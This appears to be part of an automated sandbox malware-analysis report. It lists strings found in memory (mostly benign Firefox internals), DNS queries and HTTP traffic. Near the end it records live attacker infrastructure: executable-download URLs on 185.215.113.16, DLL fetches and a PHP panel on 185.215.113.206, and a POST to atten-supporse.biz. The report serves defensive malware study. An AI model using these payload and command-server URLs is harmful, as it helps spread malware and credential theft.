Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: devtools-commandkey-profiler-start-stopNo callback set for this channel.^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools/client/framework/devtoolsbrowser and that URL. Falling back to and deploy previews URLs are allowed.Failed to listen. Listener already attached.devtools.performance.popup.feature-flagGot invalid request to save JSON dataFailed to execute WebChannel callback:WebChannel/this._originCheckCallbackbrowser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNamesdevtools-commandkey-profiler-capturedevtools.debugger.features.javascript-tracingdevtools-commandkey-javascript-tracing-toggledevtools/client/framework/devtools-browserresource://devtools/server/devtools-server.js@mozilla.org/dom/slow-script-debug;1resource://devtools/shared/security/socket.jsDevTools telemetry entry point failed: @mozilla.org/network/protocol;1?name=default@mozilla.org/network/protocol;1?name=file@mozilla.org/uriloader/handler-service;1DevToolsStartup.jsm:handleDebuggerFlagdevtools.performance.recording.ui-base-urlresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsisDownloadsImprovementsAlreadyMigratedresource://gre/modules/NetUtil.sys.mjsgecko.handlerService.defaultHandlersVersionCan't invoke URIFixup in the content processresource://gre/modules/JSONFile.sys.mjs^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?{33d75835-722f-42c0-89cc-44f328e56a86}^([a-z+.-]+:\/{0,3})*([^\/@]+@).+get FIXUP_FLAGS_MAKE_ALTERNATE_URIget FIXUP_FLAG_FORCE_ALTERNATE_URIresource://gre/modules/FileUtils.sys.mjs_injectDefaultProtocolHandlersIfNeededhttp://www.inbox.lv/rfc2368/?value=%shttps://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPScheme should be either http or httpshandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/local-handler-app;1{c6cf88b7-452e-47eb-bdc9-86e3561648ef}extractScheme/fixupChangedProtocol<browser.fixup.domainsuffixwhitelist.http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/web-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjsMust have a source and a callback@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStreamresource://gre/modules/ExtHandlerService.sys.mjsNon-zero amount of bytes must be specified@mozilla.org/network/file-input-stream;1resource://gre/modules/URIFixup.sys.mjsnewChannel requires a single object argument@mozilla.org/network/async-stream-copier;1_finalizeInternal/this._finalizePromise<@mozilla.org/scriptableinputstream;1https://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://m
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3279683763.00000132BB544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3287630311.00000132BD1C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3287630311.00000132BD1C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3287630311.00000132BD1C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: resource://gre/modules/FileUtils.sys.mjsresource://gre/modules/addons/XPIProvider.jsm*://cdn.branch.io/branch-latest.min.js**://pub.doubleverify.com/signals/pub.js**://static.criteo.net/js/ld/publishertag.js*://www.google-analytics.com/gtm/js*FileUtils_closeSafeFileOutputStream*://s0.2mdn.net/instream/html5/ima3.js*://auth.9c9media.ca/auth/main.js*://connect.facebook.net/*/all.js**://www.google-analytics.com/plugins/ua/ec.js*://www.googletagservices.com/tag/js/gpt.js**://c.amazon-adsystem.com/aax2/apstag.js*://static.chartbeat.com/js/chartbeat.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://*.imgur.io/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.jsFileUtils_closeAtomicFileOutputStreamwebcompat-reporter%40mozilla.org:1.5.1*://web-assets.toggl.com/app/assets/scripts/*.js*://*.imgur.com/js/vendor.*.bundle.jshttps://smartblock.firefox.etp/play.svg*://track.adform.net/serving/scripts/trackpoint/*://www.everestjs.net/static/st.v3.js**://static.chartbeat.com/js/chartbeat_video.jshttps://smartblock.firefox.etp/facebook.svg*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js**://www.google-analytics.com/analytics.js**://www.googletagmanager.com/gtm.js**://ssl.google-analytics.com/ga.jswebcompat-reporter@mozilla.org.xpi{5874af6d-5719-4e1b-b155-ef4eae7fcb32} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000003.3207024753.00000132C4166000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB450000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C4166000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000003.3207024753.00000132C4166000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C4166000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3276641087.00000132BB424000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB46A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic DNS traffic detected: DNS query: mdec.nelreports.net
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: feb3d39b6a.exe, 00000013.00000003.3279806734.0000000000F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: feb3d39b6a.exe, 00000013.00000003.3279806734.0000000000F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/$
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: file.exe, 00000000.00000002.2604363979.0000000000F44000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2604363979.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2604363979.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeZ
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3280263436.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3325496856.000000000098B000.00000004.00000010.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3270730206.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3278865021.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000F03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000F03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez.
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez1
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe4
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe6
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000F03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: feb3d39b6a.exe, 00000013.00000003.3270730206.0000000000F86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2604363979.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, 815f2a8fe8.exe, 00000014.00000002.3062536575.00000000007EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllL
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll;
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll8
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllj
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllv
Source: file.exe, 00000000.00000002.2604363979.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllB
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/Local
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2614456358.000000000B7C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php#
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/Fu
Source: file.exe, 00000000.00000002.2614456358.000000000B7C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?
Source: file.exe, 00000000.00000002.2614456358.000000000B7C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpC
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpHJA
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpL
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpUser
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: file.exe, 00000000.00000002.2614456358.000000000B7C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpc
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
Source: file.exe, 00000000.00000002.2593553859.0000000000347000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpfox
Source: file.exe, 00000000.00000002.2604363979.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpgPreference.Verb
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.00000000007EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/t
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/x
Source: file.exe, 00000000.00000002.2593553859.0000000000347000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206c4becf79229cb002.phpedf1eb2b06d47fdacce46c03289d-release
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
